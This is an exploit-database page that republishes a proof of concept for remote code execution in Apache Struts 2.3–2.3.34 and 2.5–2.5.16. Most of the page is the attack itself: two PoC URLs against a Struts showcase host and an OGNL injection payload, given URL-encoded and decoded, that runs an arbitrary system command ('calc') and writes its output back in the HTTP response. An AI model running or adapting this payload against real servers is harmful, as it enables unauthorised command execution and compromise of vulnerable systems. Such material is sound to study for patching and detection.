Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 Remote Code Execution PoC
CVE
Category
Price
Severity
CWE-94
Not specified
Critical
Author
Risk
Exploitation Type
Date
Not specified
High
Remote
2018-08-23
CPE
cpe:cpe:/a:apache:struts:2.5
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080157 Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 Remote Code Execution PoC PoC1:
http://www.canyouseeme.cc:8080/struts2-showcase/${(111+111)}/actionChain1.action
PoC2:
http://www.canyouseeme.cc:8080/struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew++java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23jas502n.println(%23d+)%2c%23jas502n.close())%7d/actionChain1.action
Payload code:
${
(
#_memberAccess["allowStaticMethodAccess"]=true,
#[email protected] @getRuntime().exec('calc').getInputStream(),
#b=new java.io.InputStreamReader(#a),
#c=new java.io.BufferedReader(#b),
#d=new char[51020],
#c.read(#d),
#jas502n= @org.apache.struts2.ServletActionContext@getResponse().getWriter(),
#jas502n.println(#d),
#jas502n.close())
}
More here:
https://github.com/jas502n/St2-057
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum